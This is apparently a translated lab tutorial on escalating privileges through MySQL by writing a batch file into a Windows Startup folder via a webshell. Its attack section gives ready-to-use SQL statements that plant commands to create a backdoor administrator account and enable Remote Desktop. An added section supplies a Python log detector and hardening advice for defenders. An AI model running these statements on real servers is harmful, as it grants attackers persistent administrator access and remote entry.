The key principle of startup-item privilege escalation: use MySQL to write a backdoor into the Windows startup items. Because startup items only run at boot, the target server has to be restarted after the file has been written. (This requires MySQL to be running with high privileges, at least Administrator rights or even SYSTEM.)
Lab environment
- Windows Server 2008 R2 x64
- MySQL-5.5.15-(64-bit).msi
- China Chopper (webshell management client)
Simulation
In China Chopper, enter:
select "net user zs 123.com /add & net localgroup Administrators zs /add" into dumpfile "C:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\1.bat"
After the statement is executed, the file appears in the Startup folder. Double-click it, and the user has been created and is in the Administrators group.
You can also enter:
select "net user zs 123.com /add & net localgroup Administrators zs /add & REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal' 'Server /v fDenyTSConnections /t REG_DWORD /d 0 /f" into dumpfile "C:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\1.bat"
This opens port 3389 at the same time, after which a Remote Desktop connection to the server is possible.
C:\Documents and Settings\Administrator\Start Menu\Programs\Startup\ (the path on Windows 2003 and XP)
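For detection, the following added example (not part of the original page) scans MySQL query-log lines for `INTO OUTFILE`/`INTO DUMPFILE` statements whose target is one of the Startup folders named above. The log lines are constructed samples, and the names `find_startup_writes`, `normalize` and `SAMPLE_LOG` are assumptions of this example.

```python
import re

# SELECT ... INTO OUTFILE/DUMPFILE '<path>': capture the verb and the target path.
FILE_WRITE = re.compile(
    r"""\binto\s+(outfile|dumpfile)\s+(['"])(?P<path>.*?)\2""", re.I | re.S)

# Both paths on this page (2008 R2 and 2003/XP) share this suffix.
# Localized Windows builds use other folder names and need their own marker.
STARTUP_MARKER = "\\start menu\\programs\\startup\\"

def normalize(path):
    """Approximate the path Windows receives: unify separators, undo '\\\\' escaping."""
    p = path.replace("/", "\\")
    p = re.sub(r"\\+", r"\\", p)  # collapse runs of backslashes to one
    return p.lower()

def find_startup_writes(lines):
    """Return (line_no, verb, path) for each file write into a Startup folder."""
    hits = []
    for no, line in enumerate(lines, 1):
        for m in FILE_WRITE.finditer(line):
            path = normalize(m.group("path"))
            if STARTUP_MARKER in path:
                hits.append((no, m.group(1).lower(), path))
    return hits

# Constructed sample lines; only the statement text matters to the detector.
SAMPLE_LOG = [
    r'''12 Query  select "<payload>" into dumpfile "C:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\1.bat"''',
    r"""12 Query  SELECT * FROM orders INTO OUTFILE 'D:/export/orders.csv'""",
    r"""13 Query  SELECT 'x' INTO DUMPFILE 'C:/Documents and Settings/Administrator/Start Menu/Programs/Startup/a.bat'""",
    r"""14 Query  SELECT name FROM users WHERE note = 'into the startup folder'""",
]

if __name__ == "__main__":
    for no, verb, path in find_startup_writes(SAMPLE_LOG):
        print(f"line {no}: INTO {verb.upper()} -> {path}")
```

Prevention is separate from detection: restricting `secure_file_priv`, revoking the `FILE` privilege from application accounts, and running the MySQL service under a low-privilege account remove the file-write primitive this technique depends on.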